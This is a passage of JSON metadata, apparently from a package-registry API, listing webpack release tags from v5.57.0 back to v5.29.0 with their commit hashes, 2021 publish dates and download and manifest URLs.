tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://rep